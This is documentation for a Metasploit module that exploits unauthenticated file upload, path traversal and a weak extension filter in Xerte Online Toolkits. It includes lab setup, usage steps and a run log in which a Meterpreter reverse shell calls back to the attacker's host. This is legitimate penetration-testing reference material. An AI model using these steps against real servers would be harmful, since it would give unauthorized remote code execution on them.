
Xerte Unauthenticated Mediaupload

documentation/modules/exploit/multi/http/xerte_unauthenticated_mediaupload.md


Vulnerable Application

This module exploits authentication failure, extension blacklist, and path traversal vulnerabilities in Xerte Online Toolkits versions 3.15 (at commit 4e40f8030a2e3267267db7ce03e0ff57270be6f5 as they do not use patch versions) and earlier.

The vulnerabilities exist in the /editor/elfinder/php/connector.php endpoint, which fails to kill execution after redirecting unauthenticated users. A file with a PHP payload can be uploaded and then moved outside of a user's directory to the webroot by using the elfinder "rename" functionality. Because of an improper use of regex in the file extension filter, the file can be renamed to have a .php4 extension, thus allowing remote code execution.
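As an added illustration (not Xerte's or the module's code), the sketch below shows the two server-side checks that the rename step gets past: a hypothetical end-anchored blacklist pattern that lets `.php4` through, beside a rename validator that enforces directory containment and an extension allowlist. The pattern, the allowlist and the function names are assumptions made for the example.

```python
import posixpath
import re

# Hypothetical blacklist of the kind described above: "$" sits directly
# after "php", so a trailing digit (".php4") is never matched.
WEAK_BLACKLIST = re.compile(r"\.(php|phtml|exe)$", re.IGNORECASE)

# Hardened side: only these media extensions are accepted (constructed list).
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "mp3", "mp4", "txt", "pdf"}


def weak_filter_accepts(name: str) -> bool:
    """Blacklist logic: accept every name the pattern does not match."""
    return WEAK_BLACKLIST.search(name) is None


def validate_rename(user_dir: str, new_name: str) -> str:
    """Return the normalized destination path, or raise ValueError.

    Rejects targets that leave user_dir and extensions not on the allowlist.
    """
    if "\x00" in new_name or "\\" in new_name:
        raise ValueError("illegal character in name")
    base = posixpath.normpath(user_dir)
    dest = posixpath.normpath(posixpath.join(base, new_name))
    # Containment: after resolving "..", the target must sit below user_dir.
    if dest == base or posixpath.commonpath([base, dest]) != base:
        raise ValueError("destination escapes user directory")
    # Strict by design: every dot-separated suffix must be allowed, so a
    # missing extension and double extensions are both rejected.
    suffixes = posixpath.basename(dest).lower().split(".")[1:]
    if not suffixes or any(s not in ALLOWED_EXTENSIONS for s in suffixes):
        raise ValueError("extension not on allowlist")
    return dest
```

Neither check helps if the handler keeps running after the authentication redirect, so the redirect must also terminate the request.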

Tested Xerte Online Toolkits versions 3.15, 3.14, and 3.13 on Ubuntu 24.04 and 3.15 on Windows 10.

Setup

See installation instructions

Update

```bash
sudo apt update && sudo apt upgrade
```

Install XAMPP

Download XAMPP from https://sourceforge.net/projects/xampp/

```bash
sudo ~/Downloads/xampp-linux-x64-8.2.12-0-installer.run
```

Install Xerte Online Toolkits

```bash
cd /opt/lampp/htdocs
sudo git clone https://github.com/thexerteproject/xerteonlinetoolkits
sudo mv xerteonlinetoolkits xt
cd xt
sudo git fetch --all
sudo git checkout -b master origin/master
sudo git checkout 4e40f8030a2e3267267db7ce03e0ff57270be6f5
```

Start Apache and MySQL via Xampp

To start the xampp management console:

```bash
sudo /opt/lampp/manager-linux-x64.run
```

Then ensure Apache and MySQL are running.

Setup MySQL

```bash
sudo /opt/lampp/bin/mysql
use mysql
CREATE USER 'xerteadmin'@'localhost' IDENTIFIED BY 'password123';
GRANT ALL PRIVILEGES on *.* to 'xerteadmin'@'localhost' IDENTIFIED BY 'password123';
FLUSH PRIVILEGES;
exit
```

Setup Xerte

Navigate to http://localhost/xt/setup/

  1. Click "Install"
  2. Verify System Requirements are good.
  3. Click "Next"
  4. Run sudo chmod 777 /opt/lampp/htdocs/xt/{.,setup,USER-FILES,error_logs,import}
  5. Click "Next" until you get to /setup/page1.php
  6. Verify all Module Checks
  7. Enter the user information you created before "xerteadmin:password123"
  8. Ensure the database user info is same as before, click "Next"
  9. Create Admin Account "admin1:admin123"
  10. On page3.php scroll to bottom and select "Db" authentication in the "Choose an authentication method" dropdown
  11. Hit Save

Create Normal User

http://localhost/xt/index.php

Sign in as the admin created in previous step "admin1:admin123"

Users > Manage Db auth users

Login name: user1, First name: fName, Last name: lName, Password: user123, Email: <leave blank>

Hit "Create user" then logout

Create A Template

Sign in as the new user at http://localhost/xt (or whatever directory you created under htdocs)

On the very right side of the application under "Project Templates" click the "Create" button under the "Xerte Online Toolkit" ribbon.

You should be prompted for a name for the new template. Use any name and click "Create" again. Close the Template editor that opens. When prompted to publish the changes, you can click either "Cancel" or "Ok"; it doesn't matter which.

Verification Steps

  1. Start msfconsole
  2. use exploit/multi/http/xerte_unauthenticated_mediaupload
  3. set RHOSTS <target>
  4. set TARGETURI <uri to xerte> (e.g., xerteonlinetoolkits/)
  5. set LHOST <your_ip>
  6. set USERNAME <valid user>
  7. exploit

On success, a Meterpreter session will be started. If no WEBROOT argument is provided, one is automatically detected and used.

Options

WEBROOT

The full filepath to the application root. For example /var/www/html/

If not given, the module will try to detect the webroot from the setup/ endpoint.

Scenarios

Exploiting Xerte Online Toolkits to obtain Meterpreter Session

```
msf > use exploit/multi/http/xerte_unauthenticated_mediaupload
[*] Using configured payload php/meterpreter_reverse_tcp
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set rhosts 10.0.0.45
rhosts => 10.0.0.45
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set targeturi xt
targeturi => xt
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set webroot /opt/lampp/htdocs/xt
webroot => /opt/lampp/htdocs/xt
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set username user1
username => user1
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > set lhost 10.0.0.218
lhost => 10.0.0.218
msf exploit(multi/http/xerte_unauthenticated_mediaupload) > run
[*] Started reverse TCP handler on 10.0.0.218:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Meterpreter session 1 opened (10.0.0.218:4444 -> 10.0.0.45:40848) at 2026-04-24 10:35:38 -0400
[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/USER-FILES/1-user1-Nottingham/veYtVoJC' on the target
[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/USER-FILES/1-user1-Nottingham/veYtVoJC.txt' on the target
[!] This exploit may require manual cleanup of '/opt/lampp/htdocs/xt/veYtVoJC.php4' on the target
```